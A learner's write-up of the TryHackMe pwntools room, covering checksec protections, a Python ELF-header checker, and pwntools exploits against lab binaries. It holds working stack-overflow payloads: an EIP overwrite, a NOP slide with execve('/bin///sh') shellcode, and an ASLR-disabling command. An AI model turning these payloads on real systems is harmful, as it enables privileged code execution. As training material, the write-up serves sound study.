https://tryhackme.com/room/introtopwntools
So I’m connected with ssh on the box:
Checksec
- Does Intro2pwn1 have FULL RELRO
Full RELRO makes the entire GOT read-only which removes the ability to perform a “GOT overwrite” attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
So it is more secure: it removes one way of turning a buffer overflow into code execution, although it does not prevent the overflow itself.
https://ctf101.org/binary-exploitation/relocation-read-only/
checksec intro2pwn1
YES
- Does Intro2pwn1 have RWX segments
RWX: tells us whether the binary has segments that are readable, writable and executable at the same time (memory that can be modified and then run).
We don’t see it in the output of checksec.
NO
- Does Intro2pwn2 have a stack canary
Stack canaries are tokens placed on the stack between a buffer and the saved return address to detect a stack overflow.
This allows the program to detect a buffer overflow and shut down.
NO
- Does Intro2pwn2 not have PIE
PIE stands for Position Independent Executable.
This lets the program itself be loaded at a random base address, not only its shared-library dependencies.
Example without PIE (taken from an external write-up): first create a shared library:
$ cc -fpic -shared -I. -nostdlib -nodefaultlibs -o libnotc.so os/syscall.x86_64.s os/syscall.c not/strlen.c not/puts.c
Then recompile the program against it:
$ cc -nostdlib -nodefaultlibs -I. -o dynamic-example os/start.x86_64.s main.c -L. -lnotc
- Cause a buffer overflow on intro2pwn1 by inputting a long string such as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. What was detected?
A stack buffer overflow can be caused deliberately as part of an attack known as stack smashing. It means you can use it to gain access on a machine.
- Now cause a buffer overflow on intro2pwn2. What error do you get? So, if there is no stack smashing, can I use it to gain access on the machine?
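The checksec questions above are answered by reading the tool's output by hand. As an added example (not part of the room, pwntools or checksec itself), here is a small pure-Python reader that derives the same PIE, NX, RELRO and RWX answers directly from the ELF64 program headers and dynamic tags, together with a constructed minimal ELF image to run it against. It does not detect stack canaries, which needs symbol-table parsing; the function names checksec and build_elf are mine.

```python
import struct
# Program header types/flags and dynamic tags (values from the ELF gABI).
PT_LOAD, PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 1, 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def checksec(data):
    """Return PIE / NX / RELRO / RWX findings for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not a 64-bit ELF")
    e_type = struct.unpack_from("<H", data, 16)[0]            # ET_EXEC=2, ET_DYN=3 (PIE)
    phoff, _, _, _, phentsize, phnum = struct.unpack_from("<QQIHHH", data, 32)
    res = {"pie": e_type == 3, "nx": False, "relro": "No", "rwx": False}
    dyn = None
    for i in range(phnum):
        p_type, p_flags, p_off, _, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, phoff + i * phentsize)
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            res["rwx"] = True                      # segment both writable and executable
        elif p_type == PT_GNU_STACK:
            res["nx"] = not (p_flags & PF_X)       # missing GNU_STACK => executable stack
        elif p_type == PT_GNU_RELRO:
            res["relro"] = "Partial"               # GOT read-only only after lazy binding
        elif p_type == PT_DYNAMIC:
            dyn = (p_off, p_filesz)
    if dyn and res["relro"] == "Partial":          # Full RELRO additionally needs BIND_NOW
        off, size = dyn
        for j in range(0, size, 16):
            tag, val = struct.unpack_from("<QQ", data, off + j)
            if tag == DT_NULL:
                break
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                res["relro"] = "Full"
    return res

def build_elf(pie=True, nx=True, relro="Full", rwx=False):
    """Constructed sample input: a minimal ELF64 image carrying only the headers checked above."""
    phdrs = [(PT_LOAD, PF_R | PF_X | (PF_W if rwx else 0), 0, 0, 0, 0, 0, 0x1000),
             (PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16)]
    dyn = b""
    if relro != "No":
        dyn_off = 64 + 56 * (len(phdrs) + 2)       # dynamic section follows the phdr table
        dyn = struct.pack("<QQQQ", DT_FLAGS, DF_BIND_NOW if relro == "Full" else 0, DT_NULL, 0)
        phdrs += [(PT_GNU_RELRO, PF_R, 0, 0, 0, 0, 0, 1),
                  (PT_DYNAMIC, PF_R | PF_W, dyn_off, 0, 0, len(dyn), len(dyn), 8)]
    ehdr = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack(
        "<HHIQQQIHHHHHH", 3 if pie else 2, 62, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs) + dyn
```

Pointing checksec() at the bytes of a real binary (open(path, "rb").read()) gives the same four verdicts checksec prints for it.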
cyclic
In this chapter we learn to do a buffer overflow when the canary protection is missing; you can see that with checksec.
We also learn how to convert from hex to ASCII, and ASCII to hex.
With gdb you can locate the function print_flag() like this:
info functions
Or like this:
print &print_flag
Then, in a Python script, we overwrite the saved EIP with that address:
from pwn import *
import sys
# Step 1 was cyclic(100): the 4-byte chunk that lands in EIP ('jaaa') gives the offset.
padding = cyclic(cyclic_find('jaaa'))
#eip = p32(0xdeadbeef)   # first test value, to confirm EIP is controlled
eip = p32(0x8048536)     # address of print_flag() from gdb
payload = padding + eip
sys.stdout.buffer.write(payload)   # raw bytes; print() would emit the b'...' repr
The output of the payload should be written to a file to be used later:
python pwn_cyclic.py > attack
In this file it looks like this: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaa6 (the "6" is 0x36, the first byte of the little-endian address; the remaining bytes are not printable).
Networking
Dear buzz,
I'm running a service on port 1337, which has an overflow vulnerability.
I've left you a version that will run on port 1336 so that you can develop
your exploit.
Sincerely,
dizmas
So port 1336 serves a copy of the service that is running on port 1337.
In this example we don't have to change the payload or add NOPs; it is just to show how to use the network functions.
from pwn import *
connect = remote('127.0.0.1', 1337)
print(connect.recvn(18))     # read the service banner
payload = b"A"*32            # bytes, not str: Python 3 pwntools concatenates bytes
payload += p32(0xdeadbeef)
connect.send(payload)
print(connect.recvn(34))     # read the service's reply
Shellcraft
For this challenge we need to disable ASLR (address space layout randomization).
This randomises where in memory the executable is loaded, so if we find the location of a function, the next time we run it the function will be somewhere else.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
OK, we don't have permission to do that, so use the provided script instead:
sudo ./disable_aslr.sh
Let's find the EIP: I create a string with cyclic 100, then I open the program with gdb and paste the string.
The EIP is at taaa.
So I have to write 77 * "A" and then the rest for the EIP.
Now we're going to use a Python script:
from pwn import *
import sys
padding = cyclic(cyclic_find('taaa'))   # bytes up to the saved EIP
eip = p32(0xffffd480+200)               # stack address seen in gdb, pointing into the NOP slide
nop_slide = b"\x90"*1000
shellcode = b"\xcc"                     # int3: proves execution reaches the slide
payload = padding + eip + nop_slide + shellcode
sys.stdout.buffer.write(payload)        # raw bytes; print() would emit the b'...' repr
I put the output in the file payload.
Now let's create the shellcode with shellcraft:
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f a
from pwn import *
proc = process('./intro2pwnFinal')
padding = cyclic(cyclic_find('taaa'))   # bytes up to the saved EIP
eip = p32(0xffffd510+200)               # stack address from gdb, pointing into the NOP slide
nop_slide = b"\x90"*1000
# shellcraft output from above, as a bytes literal (Python 3 pwntools needs bytes, not str)
shellcode = b"jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
#shellcode = b"\xcc"                    # int3 test version
payload = padding + eip + nop_slide + shellcode
proc.send(payload)
proc.interactive()
My EIP was wrong; gdb didn't show the value 0xffffd510.